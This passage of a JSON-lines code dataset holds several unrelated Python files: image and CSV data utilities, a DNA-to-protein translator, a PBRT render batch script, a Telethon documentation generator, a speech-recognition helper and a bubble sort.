get_name(self, item):\r\n return self.images[item].split('/')[-1]\r\n\r\n\r\ndef load_compressed_data(root_dir, json_file=None, data_name='data.npz', create=False):\r\n data_path = os.path.join(root_dir, data_name)\r\n if os.path.isfile(data_path) and create == False:\r\n print('Load data from compressed file: ', data_path)\r\n data = np.load(data_path)\r\n images = data['images']\r\n labels = data['labels']\r\n cnt = data['cnt']\r\n return images, labels, cnt\r\n\r\n if create == True and os.path.exists(data_path):\r\n os.remove(data_path)\r\n\r\n f = open(os.path.join(root_dir, json_file), 'r')\r\n data_ann = json.loads(json.load(f))\r\n images, labels, cnt = [], [], 0\r\n\r\n print(\"Found %d images in json file\" %(len(data_ann)))\r\n print('Checking image...')\r\n time_start = time.time()\r\n for i in tqdm(range(len(data_ann))):\r\n try:\r\n im_path = 
os.path.join(root_dir,\r\n 'TrainVal',\r\n str(data_ann[i]['category']),\r\n str(data_ann[i]['id']) + \".jpg\")\r\n im = imageio.imread(im_path)\r\n images.append(im_path)\r\n labels.append(int(data_ann[i]['category']))\r\n cnt += 1\r\n except:\r\n pass\r\n print('Check done in {} s'.format(time.time() - time_start))\r\n\r\n print('Writing data to binary file...')\r\n time_start = time.time()\r\n np.savez_compressed(data_path, images=images, labels=labels, cnt=cnt)\r\n print('Write to {} in {} s'.format(data_path, time.time() - time_start))\r\n\r\n return images, labels, cnt\r\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422753831","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 24 08:32:19 2017\n\n@author: rasmus\n\"\"\"\n\ndef get_reverse_strand(strand):\n reverse_strand = ''\n for i in range(1, len(strand) + 1 ):\n if strand[-i] == 'A':\n reverse_strand = reverse_strand + 'T'\n elif strand[-i] == 'T':\n reverse_strand = reverse_strand + 'A'\n elif strand[-i] == 'C':\n reverse_strand = reverse_strand + 'G' \n elif strand[-i] == 'G':\n reverse_strand = reverse_strand + 'C'\n else:\n reverse_strand = reverse_strand + 'X'\n \n return reverse_strand\n\n#%% \ndef translate_protein(bp_seq, start_frame):\n gene_map = {\"TTT\":\"F\", \"TTC\":\"F\", \"TTA\":\"L\", \"TTG\":\"L\",\n \"TCT\":\"S\", \"TCC\":\"S\", \"TCA\":\"S\", \"TCG\":\"S\",\n \"TAT\":\"Y\", \"TAC\":\"Y\", \"TAA\":\"*\", \"TAG\":\"*\",\n \"TGT\":\"C\", \"TGC\":\"C\", \"TGA\":\"*\", \"TGG\":\"W\",\n \"CTT\":\"L\", \"CTC\":\"L\", \"CTA\":\"L\", \"CTG\":\"L\",\n \"CCT\":\"P\", \"CCC\":\"P\", \"CCA\":\"P\", \"CCG\":\"P\",\n \"CAT\":\"H\", \"CAC\":\"H\", \"CAA\":\"Q\", \"CAG\":\"Q\",\n \"CGT\":\"R\", \"CGC\":\"R\", \"CGA\":\"R\", \"CGG\":\"R\",\n \"ATT\":\"I\", \"ATC\":\"I\", \"ATA\":\"I\", \"ATG\":\"M\",\n \"ACT\":\"T\", \"ACC\":\"T\", \"ACA\":\"T\", \"ACG\":\"T\",\n \"AAT\":\"N\", \"AAC\":\"N\", \"AAA\":\"K\", \"AAG\":\"K\",\n \"AGT\":\"S\", \"AGC\":\"S\", \"AGA\":\"R\", \"AGG\":\"R\",\n \"GTT\":\"V\", \"GTC\":\"V\", \"GTA\":\"V\", \"GTG\":\"V\",\n \"GCT\":\"A\", \"GCC\":\"A\", \"GCA\":\"A\", \"GCG\":\"A\",\n \"GAT\":\"D\", \"GAC\":\"D\", \"GAA\":\"E\", \"GAG\":\"E\",\n \"GGT\":\"G\", \"GGC\":\"G\", \"GGA\":\"G\", \"GGG\":\"G\",}\n\n bp_seq = bp_seq[start_frame:] # Only have start_frame as {0,1,2}\n \n aa_string = ''\n for i in range(0, int(len(bp_seq)/3)):\n triplet = bp_seq[(3*i):(3*(i+1))]\n \n if triplet in gene_map:\n aa_string = aa_string + gene_map[triplet]\n else:\n aa_string = aa_string + 'X'\n\n return aa_string\n\n#%% \ndef get_longest_ORF(aa_seq):\n all_ORF = aa_seq.split('*')\n \n longest_ORF = []\n \n for i in range(0, len(all_ORF)):\n if len(all_ORF[i]) > len(longest_ORF):\n longest_ORF = all_ORF[i]\n #elif len(all_ORF[i]) == len(longest_ORF):\n # print('WARNING, ORFs with same length')\n return longest_ORF\n\n\n#%% \ndef print_gene_results(name_of_gene, sequence):\n print(name_of_gene)\n \n reverse_strand = get_reverse_strand(sequence)\n \n longest_frame = ''\n for i in range(0,3):\n protein_reverse = translate_protein(reverse_strand, i)\n protein_forward = translate_protein(sequence, i)\n \n reverse_longest_ORF = get_longest_ORF(protein_reverse)\n forward_longest_ORF = get_longest_ORF(protein_forward)\n\n if len(reverse_longest_ORF) > len(longest_frame):\n longest_frame = reverse_longest_ORF\n \n if len(forward_longest_ORF) 
>= len(longest_frame):\n longest_frame = forward_longest_ORF\n if len(longest_frame) > 0: \n print(longest_frame)\n else:\n print('')\n\n \n#%% \ndef main():\n \n with open('translationtest.dna', 'r') as f:\n name_of_gene = ''\n sequence = ''\n \n for line in f:\n if line[0] == '>':\n if not name_of_gene == '':\n print_gene_results(name_of_gene, sequence.upper())\n # Remove possible rest of line\n name_of_gene = line.split(' ')\n name_of_gene = name_of_gene[0].rstrip()\n sequence = ''\n else :\n sequence = sequence + line.rstrip()\n \n print_gene_results(name_of_gene, sequence.upper())\n\n\n\nif __name__ == '__main__':\n main()\n \n \n \n \n \n \n \n \n \n \n ","sub_path":"assignement2/dna2aa.py","file_name":"dna2aa.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471892028","text":"import os, random\n#IPython Notebook implementation\n#from IPython.display import display, Image\nfrom PIL import Image\n\ndata_root = 'D:\\\\Udacity\\\\Deep Learning\\\\notMNIST_small'\n\ndef showRandomImage(dir):\n i = Image.open(os.path.join(data_root, dir, random.choice(os.listdir(dir))))\n i.show()\n #IPython notebook implementation\n #i = Image(filename=os.path.join(data_root, dir, random.choice(os.listdir(dir))))\n #display(i)\n\n\nfor dirs in os.listdir(data_root):\n if os.path.isdir(os.path.join(data_root, dirs)):\n showRandomImage(os.path.join(data_root, dirs))","sub_path":"Deep Learning/Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244520251","text":"#!/usr/local/bin/python3\n\n#@author\t\tBrandon Tarney\n#@date\t\t\t8/31/2018\n#@description\tScript to remove the final column of csv\n\nfrom file_manager import FileManager\nimport csv\nimport argparse\nimport numpy as np\n\n#=============================\n# MAIN PROGRAM\n#=============================\ndef main():\n\t#print('LOG: Main program to run tests')\n\n\tparser = argparse.ArgumentParser(description='Remove the final column')\n\tparser.add_argument('file_path_in', type=str, help='full path to input file')\n\tparser.add_argument('file_path_out', type=str, help='full path to output file')\n\tparser.add_argument('columns', nargs='+', type=int, help='the columns to remove')\n\targs = parser.parse_args()\n\tcolumns = args.columns\n\tcolumns = sorted(columns, reverse=True)\n\tprint('deleting these columns in this order')\n\tprint(columns)\n\n\tdata = FileManager.get_csv_file_data_numpy(args.file_path_in, ',')\n\tfor column in columns:\n\t\tdata = np.delete(data, column, axis=1)\n\tdata_as_numbers = data.astype(np.float)\n\n\tnp.savetxt(args.file_path_out, data_as_numbers, delimiter=',')\n\n\t'''\n\t#INPUTS\n\tprint()\n\tprint('INPUTS')\n\tinput_path = args.file_path_in\n\tprint('input file path:', input_path)\n\toutput_path = args.file_path_out\n\tprint('output file path:', output_path)\n\n\t#STRIP GIVEN COLUMN\n\tcol_idx = args.column\n\twith open(input_path, \"r\") as file_in:\n\t\twith open(output_path, \"w\") as file_out:\n\t\t\twriter = csv.writer(file_out)\n\t\t\tfor row in csv.reader(file_in):\n\t\t\t\tnew_row = row[0:col_idx]\n\t\t\t\tnew_row.append(row[col_idx+1:])\n\t\t\t\twriter.writerow(new_row)\n\t'''\n\n\nif __name__ == 
'__main__':\n\tmain()\n","sub_path":"src/rm_col.py","file_name":"rm_col.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178397929","text":"#!/usr/bin/python \n\n# Imports \nimport sys, os, subprocess\n\n####################################################################################################\n# @get_files_in_directory\n####################################################################################################\ndef get_files_in_directory(directory,\n file_extension=None):\n \"\"\"\n Gets all the files in a directory, similar to ls command in linux. If the\n file extension is not specified, it returns a list of all the files.\n\n :param directory: Given directory.\n :param file_extension: The extension of requested file.\n :return: A list of the requested files.\n \"\"\"\n\n # A list of all the files that exist in a directory\n files = []\n\n # If the extension is not specified\n if file_extension is None:\n for file in os.listdir(directory):\n files.append(file)\n\n # Otherwise, return files that have specific extensions\n else:\n for file in os.listdir(directory):\n if file.endswith(file_extension):\n files.append(file)\n\n # Return the list\n return files\n \n# PBRT executable \npbrt = '/home/abdellah/projects/bbp-pbrt-v2/build/bin/pbrt'\n\n# Read the input file\ninput_pbrt_file = 'gaussian.pbrt.input'\ninput_pbrt_file_template = list()\n\n# Open the file \ninput_pbrt_file_handle = open(input_pbrt_file, 'r')\n\n# Read it line by line \nfor line in input_pbrt_file_handle:\n input_pbrt_file_template.append(line)\n\n# Close the file \ninput_pbrt_file_handle.close()\n\n# Column y \ncolumn_y = 3.13 \n\n# Column height resolution \nvolume_y = 313\n\n# Step \nstep = column_y / volume_y\n\n# Number of steps \nn_steps = int(column_y / float(step))\n\n# Output directory \noutput_directory = 'output'\n\n# Number of photons \nnumber_photons = 10000000\n\n# Create an output file for each step\nfor i in range(0, 0):#n_steps + 1):\n \n # Output pbrt configuration \n output_pbrt_file_data = list()\n \n # Depth \n depth = str(i * step)\n \n # Prefix \n prefix = '%s_%s' % (depth, str(number_photons))\n \n # Replace the parameters \n for line in input_pbrt_file_template:\n if 'NUMBER_PHOTONS' in line:\n n_photons_line = line\n n_photons_line = n_photons_line.replace('NUMBER_PHOTONS', str(number_photons))\n output_pbrt_file_data.append(n_photons_line)\n elif 'OUTPUT' in line:\n output_line = line\n output_line = output_line.replace(\n 'OUTPUT', '%s_depth%s_n%s' % (str(i), depth, str(number_photons)))\n output_pbrt_file_data.append(output_line)\n elif 'DEPTH' in line:\n depth_line = line\n depth_line = depth_line.replace('DEPTH', depth)\n output_pbrt_file_data.append(depth_line)\n else:\n output_pbrt_file_data.append(line)\n \n # Output file \n output_pbrt_file = '%s/%s_%s.pbrt' % (output_directory, str(i), depth)\n print(output_pbrt_file)\n \n # Write the output file \n output_pbrt_file_handle = open(output_pbrt_file, 'w')\n for line in output_pbrt_file_data:\n output_pbrt_file_handle.write(line)\n \n # Close the output file\n output_pbrt_file_handle.close()\n \n \n# Get all the files in the directory \npbrt_scripts = get_files_in_directory(output_directory, '.pbrt')\n\n# Change directory \nos.chdir(output_directory)\n\n# Execute them one by one \nfor script in pbrt_scripts:\n \n # Execute the script \n shell_command = '%s %s' % (pbrt, script)\n print(shell_command)\n 
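# subprocess.call blocks until pbrt exits, so the scenes are rendered one at a time.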
subprocess.call(shell_command, shell=True) \n \n \n","sub_path":"vsd/kernel/create-gaussian-kernels.py","file_name":"create-gaussian-kernels.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120473114","text":"def write_core_index(docs, tlobjects, layer):\n # Determine method, types and constructors count\n types = set()\n method_count = 0\n constructor_count = 0\n for tlobject in tlobjects:\n if tlobject.is_function:\n method_count += 1\n else:\n constructor_count += 1\n\n types.add(tlobject.result)\n\n type_count = len(types)\n types.clear()\n\n # Write the head and the full HTML\n docs.write_head('Telethon API', relative_css_path='css/docs.css')\n\n # Welcome text, small explanation about this page\n docs.write('''Telethon API\n\nThis documentation was generated straight from the scheme.tl provided by Telegram. However, there is no official documentation per se on what the methods, constructors and types mean. Nevertheless, this page aims to provide easy access to all the available methods, their definition and parameters.\n\nAlthough this documentation was generated for Telethon, it may be useful for any other Telegram library out there.\n'''\n\n # Methods section\n '''Methods\n\nCurrently there are {methodcount} methods available for the layer {layer}. The complete list can be seen here.\n\nTo invoke any of these methods (also called requests), you can do as shown on the following example:\n'''\n\n # Example usage for the methods\n '''#!/usr/bin/python3\nfrom telethon import TelegramClient\nfrom telethon.tl.functions.messages import GetHistoryRequest\nfrom telethon.utils import get_input_peer\n\n# Use your own values here\napi_id = 12345\napi_hash = '0123456789abcdef0123456789abcdef'\nphone_number = '+34600000000'\n\n# Create the client and connect\nclient = TelegramClient('username', api_id, api_hash)\nclient.connect()\n\n# Ensure you're authorized\nif not client.is_user_authorized():\n client.send_code_request(phone)\n client.sign_in(phone, input('Enter the code: '))\n\n# Using built-in methods\ndialogs, entities = client.get_dialogs(10)\nentity = entities[0]\n\n# !! Invoking a request manually !!\nresult = client.invoke(\n GetHistoryRequest(\n get_input_peer(entity),\n limit=20,\n offset_date=None,\n offset_id=0,\n max_id=0,\n min_id=0,\n add_offset=0))\n\n# Now you have access to the first 20 messages\nmessages = result.messages'''\n\n # Example end\n '''As you can see, manually invoking requests with client.invoke() is way more verbose than using the built-in methods. However, and given that there are so many methods available, it's impossible to provide a nice interface to things that may change over time. To get full access, however, you're still able to invoke these methods manually.\n'''\n\n # Types section\n '''Types\n\nCurrently there are {typecount} types. You can see the full list here.\n\nThe Telegram types are the abstract results that you receive after invoking a request. They are \"abstract\" because they can have multiple constructors. For instance, the abstract type User can be either UserEmpty or User. You should, most of the time, make sure you received the desired type by using the isinstance(result, Constructor) Python function.\n\nWhen a request needs a Telegram type as argument, you should create an instance of it by using one of its, possibly multiple, constructors.\n'''\n\n # Constructors section\n '''Constructors\n\nCurrently there are {constructorcount} constructors. You can see the full list here.\n\nConstructors are the way you can create instances of the abstract types described above, and also the instances which are actually returned from the functions although they all share a common abstract type.\n'''\n\n # Core types section\n '''Core types\n\nCore types are types from which the rest of Telegram types build upon:\n\n• int: The value should be an integer type, like 42. It should have 32 bits or less. You can check the bit length by calling a.bit_length(), where a is an integer variable.\n• long: Different name for an integer type. The numbers given should have 64 bits or less.\n• int128: Another integer type, should have 128 bits or less.\n• int256: The largest integer type, allowing 256 bits or less.\n• double: The value should be a floating point value, such as 123.456.\n• Vector<T>: If a type T is wrapped around Vector<T>, then it means that the argument should be a list of it. For instance, a valid value for Vector<int> would be [1, 2, 3].\n• string: A valid UTF-8 string should be supplied. This is right how Python strings work, no further encoding is required.\n• Bool: Either True or False.\n• true: These arguments aren't actually sent but rather encoded as flags. Any truthy value (True, 7) will enable this flag, although it's recommended to use True or None to symbolize that it's not present.\n• bytes: A sequence of bytes, like b'hello', should be supplied.\n• date: Although this type is internally used as an int, you can pass a datetime object instead to work with date parameters.\n
    '''.format(\n layer=layer,\n typecount=type_count,\n methodcount=method_count,\n constructorcount=constructor_count\n ))\n docs.end_body()\n","sub_path":"docs/generate_core.py","file_name":"generate_core.py","file_ext":"py","file_size_in_byte":6887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"408156924","text":"import speech_recognition as sr\nfrom time import ctime\nimport os\nfrom gtts import gTTS\nimport webbrowser\n\ndef speak(audioString):\n tts = gTTS(text=audioString, lang='en')\n tts.save(\"audio.mp3\")\n os.system(\"audio.mp3\")\n\n# Record Audio\ndef recordAudio():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n audio = r.listen(source)\n data = ''\n try:\n data = r.recognize_google(audio)\n except sr.UnknownValueError:\n return \"Google Speech Recognition could not understand audio\"\n except sr.RequestError as e:\n return \"Could not request results from Google Speech Recognition service; {0}\".format(e)\n return data\n\n\ndef jarvis(data):\n if \"how are you\" in data:\n speak(\"I am fine\")\n\n if \"what time is it\" in data:\n speak(ctime())\n\n if \"where is\" in data:\n data = data.split(\" \")\n # location = data[2]\n location = \"london\"\n speak(\"Hold on , I will show you where \" + location + \" is.\")\n url = \"https://www.google.nl/maps/place/\" + location + \"/&\"\n return webbrowser.open_new_tab(url)\n\nif __name__ == '__main__':\n jarvis(\"where is\")","sub_path":"Speech_Text.py","file_name":"Speech_Text.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568213594","text":"\"\"\"\nWe use \"config\" files to refer to all files that may reside in the \"config\" directory:\n* \"Settings\" files (ending in '.yaml') which drive the data warehouse settings\n* Environment files (with variables)\n* Other files (like release notes)\n\nThis module provides global access to settings. 
Always treat them nicely and read-only.\n\"\"\"\n\nimport datetime\nimport logging\nimport logging.config\nimport os\nimport os.path\nimport re\nimport sys\nfrom collections import OrderedDict\nfrom functools import lru_cache\nfrom typing import Any, Dict, Iterable, List, Optional, Sequence, Set\n\nimport jsonschema\nimport pkg_resources\nimport simplejson as json\nimport yaml\n\nimport etl.config.dw\nimport etl.monitor\nfrom etl.config.dw import DataWarehouseConfig\nfrom etl.errors import ETLRuntimeError, InvalidArgumentError, SchemaInvalidError, SchemaValidationError\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\n# Global config objects - always use accessors!\n_dw_config = None # type: Optional[DataWarehouseConfig]\n_mapped_config = None # type: Optional[Dict[str, str]]\n\n# Local temp directory used for bootstrap, temp files, etc.\nETL_TMP_DIR = \"/tmp/redshift_etl\"\n\n\ndef package_version(package_name=\"redshift_etl\"):\n return \"{} v{}\".format(package_name, pkg_resources.get_distribution(package_name).version)\n\n\ndef get_dw_config():\n return _dw_config\n\n\ndef get_config_value(name: str, default: Optional[str] = None) -> Optional[str]:\n \"\"\"\n Lookup configuration value in known and flattened settings -- pass in a fully-qualified name\n\n Note the side effect here: once accessed, the settings remember the default if it wasn't set before.\n \"\"\"\n assert _mapped_config is not None, \"attempted to get config value before reading config map\"\n if default is None:\n return _mapped_config.setdefault(name)\n else:\n return _mapped_config.setdefault(name, default)\n\n\ndef get_config_int(name: str, default: Optional[int] = None) -> int:\n \"\"\"\n Lookup a configuration value that is an integer.\n It is an error if the value (even when using the default) is None.\n \"\"\"\n if default is None:\n value = get_config_value(name)\n else:\n value = get_config_value(name, str(default))\n if value is None:\n raise InvalidArgumentError(\"missing config for {}\".format(name))\n else:\n return int(value)\n\n\ndef set_config_value(name: str, value: str) -> None:\n \"\"\"\n Set configuration value to given string.\n \"\"\"\n assert _mapped_config is not None, \"attempted to set config value before reading config map\"\n _mapped_config[name] = value\n\n\ndef set_safe_config_value(name: str, value: str) -> None:\n \"\"\"\n Replace \"unsafe\" characters with '-' and set configuration value.\n\n >>> etl.config._mapped_config = {}\n >>> set_safe_config_value(\"test_value\", \"something/unsafe\")\n >>> get_config_value(\"test_value\")\n 'something-unsafe'\n \"\"\"\n set_config_value(name, \"-\".join(re.findall(\"[a-zA-Z0-9_.-]+\", value)))\n\n\ndef get_config_map() -> Dict[str, str]:\n if _mapped_config is None:\n return {}\n else:\n # Since the mapped config is flattened, we don't worry about a deep copy here.\n return dict(_mapped_config)\n\n\ndef _flatten_hierarchy(prefix, props):\n assert isinstance(props, dict), \"oops, this should only be called with dicts, got {}\".format(type(props))\n for key in sorted(props):\n full_key = \"{}.{}\".format(prefix, key)\n if isinstance(props[key], dict):\n for sub_key, sub_prop in _flatten_hierarchy(full_key, props[key]):\n yield sub_key, sub_prop\n else:\n yield full_key, props[key]\n\n\ndef _build_config_map(settings):\n mapping = OrderedDict()\n # Load everything that is not explicitly handled by the data warehouse configuration\n for section in frozenset(settings).difference({\"data_warehouse\", \"sources\", 
\"type_maps\"}):\n for name, value in _flatten_hierarchy(section, settings[section]):\n mapping[name] = value\n return mapping\n\n\ndef etl_tmp_dir(path: str) -> str:\n \"\"\"\n Return the absolute path within the ETL runtime directory for the selected path.\n \"\"\"\n return os.path.join(ETL_TMP_DIR, path)\n\n\ndef configure_logging(full_format: bool = False, log_level: str = None) -> None:\n \"\"\"\n Setup logging to go to console and application log file\n\n If full_format is True, then use the terribly verbose format of\n the application log file also for the console. And log at the DEBUG level.\n Otherwise, you can choose the log level by passing one in.\n \"\"\"\n config = load_json(\"logging.json\")\n if full_format:\n config[\"formatters\"][\"console\"] = dict(config[\"formatters\"][\"file\"])\n config[\"handlers\"][\"console\"][\"level\"] = logging.DEBUG\n elif log_level:\n config[\"handlers\"][\"console\"][\"level\"] = log_level\n logging.config.dictConfig(config)\n # Ignored due to lack of stub in type checking library\n logging.captureWarnings(True) # type: ignore\n logger.info(\"Starting log for %s with ETL ID %s\", package_version(), etl.monitor.Monitor.etl_id)\n logger.info('Command line: \"%s\"', \" \".join(sys.argv))\n logger.debug(\"Current working directory: '%s'\", os.getcwd())\n logger.info(get_release_info())\n\n\ndef load_environ_file(filename: str) -> None:\n \"\"\"\n Load additional environment variables from file.\n\n Only lines that look like 'NAME=VALUE' or 'export NAME=VALUE' are used,\n other lines are silently dropped.\n \"\"\"\n logger.info(\"Loading environment variables from '%s'\", filename)\n with open(filename) as f:\n for line in f:\n tokens = [token.strip() for token in line.split(\"=\", 1)]\n if len(tokens) == 2 and not tokens[0].startswith(\"#\"):\n name = tokens[0].replace(\"export\", \"\").strip()\n value = tokens[1]\n os.environ[name] = value\n\n\ndef load_settings_file(filename: str, settings: dict) -> None:\n \"\"\"\n Load new settings from config file or a directory of config files\n and UPDATE settings (old settings merged with new).\n \"\"\"\n logger.info(\"Loading settings from '%s'\", filename)\n with open(filename) as f:\n new_settings = yaml.safe_load(f)\n for key in new_settings:\n # Try to update only update-able settings\n if key in settings and isinstance(settings[key], dict):\n settings[key].update(new_settings[key])\n else:\n settings[key] = new_settings[key]\n\n\ndef get_release_info() -> str:\n \"\"\"\n Read the release file and return all lines bunched into one comma-separated value.\n Life's exciting. And short. But mostly exciting.\n \"\"\"\n if pkg_resources.resource_exists(__name__, \"release.txt\"):\n content = pkg_resources.resource_string(__name__, \"release.txt\")\n text = content.decode(errors=\"ignore\").strip()\n lines = [line.strip() for line in text.split(\"\\n\")]\n release_info = \", \".join(lines)\n else:\n release_info = \"Not available. 
Hint: release info will be created by upload_env.sh\"\n return \"Release information: \" + release_info\n\n\ndef yield_config_files(config_files: Sequence[str], default_file: str = None) -> Iterable[str]:\n \"\"\"\n Generate filenames from the list of files or directories in :config_files and :default_file\n\n If the default_file is not None, then it is always prepended to the list of files.\n (It is an error (sadly, at runtime) if the default file is not a file that's part of the package.)\n\n Note that files in directories are always sorted by their name.\n \"\"\"\n if default_file:\n yield pkg_resources.resource_filename(__name__, default_file)\n\n for name in config_files:\n if os.path.isdir(name):\n files = sorted(os.path.join(name, n) for n in os.listdir(name))\n else:\n files = [name]\n for filename in files:\n yield filename\n\n\ndef load_config(config_files: Sequence[str], default_file: str = \"default_settings.yaml\") -> None:\n \"\"\"\n Load settings and environment from config files (starting with the default if provided),\n set our global settings.\n\n The settings are validated against their schema.\n If the config \"file\" is actually a directory, (try to) read all the files in that directory.\n \"\"\"\n settings = dict() # type: Dict[str, Any]\n count_settings = 0\n for filename in yield_config_files(config_files, default_file):\n if filename.endswith(\".sh\"):\n load_environ_file(filename)\n elif filename.endswith((\".yaml\", \".yml\")):\n load_settings_file(filename, settings)\n count_settings += 1\n else:\n logger.info(\"Skipping unknown config file '%s'\", filename)\n\n # Need to load at least the defaults and some installation specific file:\n if count_settings < 2:\n raise ETLRuntimeError(\"Failed to find enough configuration files (need at least default and local config)\")\n\n validate_with_schema(settings, \"settings.schema\")\n\n # If 'today' and 'yesterday' are not set already, pick the actual values of \"today\" and \"yesterday\" (wrt UTC).\n today = datetime.datetime.utcnow().date()\n date_settings = settings.setdefault(\"date\", {})\n date_settings.setdefault(\"today\", today.strftime(\"%Y/%m/%d\")) # Render date to look like part of a path\n date_settings.setdefault(\"yesterday\", (today - datetime.timedelta(days=1)).strftime(\"%Y/%m/%d\"))\n\n global _mapped_config\n _mapped_config = _build_config_map(settings)\n\n global _dw_config\n _dw_config = etl.config.dw.DataWarehouseConfig(settings)\n\n set_config_value(\"version\", package_version())\n\n\ndef validate_with_schema(obj: dict, schema_name: str) -> None:\n \"\"\"\n Validate the given object (presumably from reading a YAML file) against its schema.\n\n This will also validate the schema itself!\n \"\"\"\n validation_internal_errors = (\n jsonschema.exceptions.ValidationError,\n jsonschema.exceptions.SchemaError,\n json.scanner.JSONDecodeError,\n )\n try:\n schema = etl.config.load_json(schema_name)\n jsonschema.Draft4Validator.check_schema(schema)\n except validation_internal_errors as exc:\n raise SchemaInvalidError(\"schema in '%s' is not valid\" % schema_name) from exc\n try:\n jsonschema.validate(obj, schema)\n except validation_internal_errors as exc:\n raise SchemaValidationError(\"failed to validate against '%s'\" % schema_name) from exc\n\n\ndef gather_setting_files(config_files: Sequence[str]) -> List[str]:\n \"\"\"\n Gather all settings files (*.yaml and *.sh files) -- this drops any hierarchy in the config files (!).\n\n It is an error if we detect that there are settings files in separate 
directories that have the same filename.\n    So trying '-c hello/world.yaml -c hola/world.yaml' triggers an exception.\n    \"\"\"\n    settings_found = set()  # type: Set[str]\n    settings_with_path = []\n\n    for fullname in yield_config_files(config_files):\n        filename = os.path.basename(fullname)\n        if filename.startswith(\"credentials\") and filename.endswith(\".sh\"):\n            continue\n        if filename.endswith((\".yaml\", \".yml\", \".sh\")):\n            if filename not in settings_found:\n                settings_found.add(filename)\n            else:\n                raise KeyError(\"found configuration file in multiple locations: '%s'\" % filename)\n            settings_with_path.append(fullname)\n    return sorted(settings_with_path)\n\n\n@lru_cache()\ndef load_json(filename: str):\n    return json.loads(pkg_resources.resource_string(__name__, filename))  # type: ignore\n\n\nif __name__ == \"__main__\":\n    print(get_release_info())\n","sub_path":"python/etl/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"47881112","text":"import re\n\nfrom maya import cmds \n\n\n# These are all of the named framerates. The rest of them look\n# like \"100fps\".\nunit_to_fps = {\n    'sec': 1,\n    'game': 15, \n    'film': 24, \n    'pal': 25, \n    'ntsc': 30, \n    'show': 48, \n    'palf': 50, \n    'ntscf': 60,\n    'millisec': 1000,\n    # NOTE: We don't support 'min' or 'hour' here because we return integers.\n}\n\nfps_to_unit = {v: k for k, v in unit_to_fps.iteritems()}\n\nvalid_fpses = frozenset((\n\n    # The named ones above.\n    15, 24, 25, 30, 48, 50, 60, \n\n    # The rest of the known valid FPSes as of Maya 2016.\n    2, 3, 4, 5, 6, 8, 10, 12, 16, 20, 40, 75, 80, 100, 120, 125, 150, 200,\n    240, 250, 300, 375, 400, 500, 600, 750, 1200, 1500, 2000, 3000, 6000,\n\n))\n\n\ndef get_fps():\n    '''\n    Get current framerate as an integer.\n\n    ::\n        >>> units.get_fps()\n        24\n\n    '''\n\n    unit = cmds.currentUnit(q=True, time=True)\n    try: \n        return unit_to_fps[unit]\n    except KeyError:\n        pass\n\n    m = re.match(r'(\\d+)fps', unit)\n    if m:\n        return int(m.group(1))\n\n    raise ValueError(\"Unknown Maya time unit %r\" % unit)\n\n\ndef set_fps(fps):\n    '''\n    Set current framerate as an integer.\n\n    :param int fps: The framerate to set.\n\n    ::\n        >>> units.set_fps(12)\n        >>> units.get_fps()\n        12\n\n    '''\n\n    unit = fps_to_unit.get(fps) or ('%dfps' % fps)\n    try:\n        cmds.currentUnit(time=unit)\n    except ValueError:\n        raise ValueError(\"Unsupported framerate %s\" % fps)\n","sub_path":"mayatools/units/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117672683","text":"import cv2\nimport numpy\n\nname = 'mean'\n\nclass Mean:\n\n    def getMean(self, buffer):\n        \n        stackedFlattened = numpy.vstack([frame.ravel() for frame in buffer]) \n        frameShape = buffer[0].shape\n        del buffer\n        \n        meanImageFlattened = numpy.mean(stackedFlattened, axis = 0)\n        del stackedFlattened\n        \n        meanImage = numpy.uint8(meanImageFlattened.reshape(frameShape))\n        del meanImageFlattened\n\n        return meanImage\n","sub_path":"mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495007311","text":"def bubble_sort(arr):\n    swaps = 0\n    for i in range(len(arr)):\n        \n        for j in range(len(arr)-i-1):\n            \n            if arr[j] > arr[j+1]:\n                arr[j], arr[j+1] = arr[j+1], arr[j]\n                swaps += 1\n    return swaps\n\nif __name__ ==
